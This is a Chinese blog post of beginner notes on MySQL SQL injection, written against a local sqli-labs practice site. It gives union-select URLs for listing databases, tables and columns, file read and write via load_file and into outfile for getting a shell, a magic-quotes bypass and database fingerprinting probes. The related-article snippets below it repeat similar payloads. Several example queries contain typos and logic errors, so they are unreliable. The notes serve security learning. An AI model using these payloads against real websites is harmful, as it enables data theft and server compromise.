初学MySQL的笔记

最新推荐文章于 2024-07-20 16:33:27 发布
最新推荐文章于 2024-07-20 16:33:27 发布
阅读量767 收藏
点赞数
文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67399862/article/details/123444183
版权

1.信息收集:报错页面的数字是啥,就在相对应的数字位置进行替代获取信息

(1)操作系统(@@version_compile_os)

(2)数据库名(table_achema)

例:select SCHEMA_NAME from INDORMATION_SCHEMATA

或 http://127.0.0.1:8080/sqlilabs/Less—2/?id=-1 union select 1, group_concat(schema_name),3 from information_schema.schemata

(3)表名(table_name)

例:select TABLE_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA=(select DATABASE())

或http://127.0.0.1:8080/sqlilabs/Less—2/?id=-1 union select 1, group_concat(schema_name),3 from information_schema.schemata. tables where table_schema='qqyw'

(4)列名(column_name)

例:select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin'或http://127.0.0.1:8080/sqlilabs/Less—2/?id=-1 union select 1, group_concat(schema_name),3 from information_schema.columns where table_name='admin'

(5)数据库用户(user()):可以看权限的高低

(6)数据库版本(version())

2.数据注入

(1)低版本(5.0以下):暴力查询或结合读取查询(字典或读取)

(2)高版本(5.0以上):information_schema有据查询

3.高权限注入

(1)常规查询

(2)跨库查询(利用注入进行跨数据库查询)

4.文件读写(利用注入进行文件读取或写入)

(1)文件读写操作:

load_file:读取函数

注:文件的位置必须在服务器上,文件必须为全路径名称(绝对路径),而且用户必须持有FILE权限,文件容量也必须小于max_allowed_packet 字节(默认为16MB,最大为1GB)

into outfile或into dumpfile:导出函数

两者区别:dumpfile适用于二进制文件,它会将目标文件写入同一行,而outfile则更适用于文本文件。

(2)getshell

若存在魔术引号(magic_quotes_gpc)

编码或字节绕过

magic_quotes_gpc=on时,输入数据中含单引号(‘)、双引号(“)、反斜线(\)、与NULL等字符,都会被加上反斜线。

(3)路径获取常见方法

a.报错显示

在注入点后直接加上单引号,当报错信息为MICROSOFT JET DATABASE ENGINE 错误 80040e14,说明是通过JET引擎连接数据库,该注入点所连接的数据库类型为ACCESS数据库。如果是ODBC的话,就说明数据库是MSSQL数据库。

在注入后加上;--(一个分号,两个横线)例如:http://******id=12;--提交,如果这个页面返回正常,则该数据库为MSSQL,如果报错,则为ACCESS数据库。

用and exists (select count(*) from sysobjects)和and exists (select count(*) from msysobjects)来判断,如果每一条返回都正常,那就是MSSQL数据库,如果两条都不正常,那就是ACCESS数据库。

b.遗留文件

c.漏洞报错

d.平台配置文件

e.爆破等

m0_67399862
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈SQL注入中的-1‘ union select 1,2,3#
qq_23667585的博客
10-09 8061
超详细的介绍了SQL注入语句中的 -1' union select 1,2,3# 的含义
sqli_lab(less1-10)解题方法
weixin_43952190的博客
07-19 341
GET注入 less1: ?id=1’ #报错 ?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常 ?id=1’ order by 3–+ #正常 ?id=-1’ union select 1,2,3–+ #2为显示位 ?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+ ?id=-1’
一句话告诉你SQL注入中的select 1,2,3是什么意思,详解sql注入每一部分意义
qq_62708558的博客
02-13 1万+
1,2,3会分别按照id,username,password的顺序输出,因为我们假设了登陆成功就会输出用户名和密码,因此1是不显示的,紧接着来到第二列,对应输出2所以我们知道账号是表格中的第二列,以此类推密码就是表格中的第三列
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9012
sql注入中的union联合查询,union select 1,2,3
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
MySQL初学笔记1
03-19
MySQL笔记
mysql笔记.zip
01-23
王勇老师的MySQL教程日志将帮助你从基础到深入地学习这个强大的数据库系统,无论你是初学者还是经验丰富的开发者,都能从中受益匪浅。通过实践这些知识,你可以更高效地管理和操作数据库,提升数据管理的效率和质量...
大一大二mysql笔记
04-30
以下是一份详细的知识点概述,旨在帮助初学者理解MySQL的基本概念、操作和应用。 一、MySQL简介 MySQL是一款开源、免费的SQL数据库,由瑞典MySQL AB公司开发,现在属于Oracle公司。它支持多种操作系统,如Windows、...
MySQL笔记1
08-04
在这个"MySQL笔记1"中,我们将探讨一些基本的MySQL管理和操作命令,包括如何启动和停止MySQL服务,以及如何连接到数据库服务器。 首先,我们来看一下启动和停止MySQL服务的两种方法。在Windows操作系统中,可以通过...
MySQL笔记-MySQL⾼⼿系列
12-04
本系列笔记将带你从入门到精通,掌握MySQL的使用和优化。 1. **背景介绍** 在信息化社会中,数据库是存储和管理大量数据的关键工具。MySQL因其免费且性能优异的特点,成为了许多企业和开发者首选的数据库系统。与...
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9614
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。 SQL注入的分类 根据SQL数据类型分类 整型注...
sql注入中的union select 1,2,3....
good good study
03-15 2万+
sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
系列2:5、sql注入之高权限注入
qq_44704184的博客
03-25 3793
sql注入之高权限注入 在数据库中区分有数据库系统用户与数据库**普通用户,**二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接,会区分系统用户链接与普通用户链接;当多个网站存在一个数据库的时候.root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可
渗透自学(三)SQL注入(一)
qq_57449919的博客
01-10 1602
渗透基础自学知识,有写的不好的地方请多多指出
MySQL注入涉及的information_schema库讲解
雷根瓦尔德
11-19 2988
当我们在进行MySQL手工注入的时候,经常要涉及到一个库“infromation_schema”,可能有些朋友在用的时候,对这个库的操作或多或少有些理解,但是细想又不知道怎么说。大概就是知道这样做也挺明白,就是讲不出为啥????。 这篇文章不是讲MySQL注入实战,旨在讲述我们在注入时使用information_schema库主要涉及的一些表,使同为新手的朋友能了解这些语句的用意和意义。我近期挖出并提交...
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5580
SQL注入环境搭建及多种注入类型测试实验
mysql -- 手工注入
Nixawk
04-22 6459
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
MySQLSELECT 语句
最新发布
Zachyy的博客
07-20 373
MySQL 中,可以使用 SELECT语句来查询数据。查询数据是指从数据库中根据需求,使用不同的查询方式来获取不同的数据,是使用频率最高、最重要的操作。
mysql初学笔记
08-26
MySQL初学笔记是一份由一位学习数据库初学者总结的详细笔记,其中包含了MySQL的基础知识和高级应用。这份笔记包括了MySQL的高级查询方法和存储过程的编写,旨在帮助初学者更好地理解和应用MySQL数据库。这份笔记...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值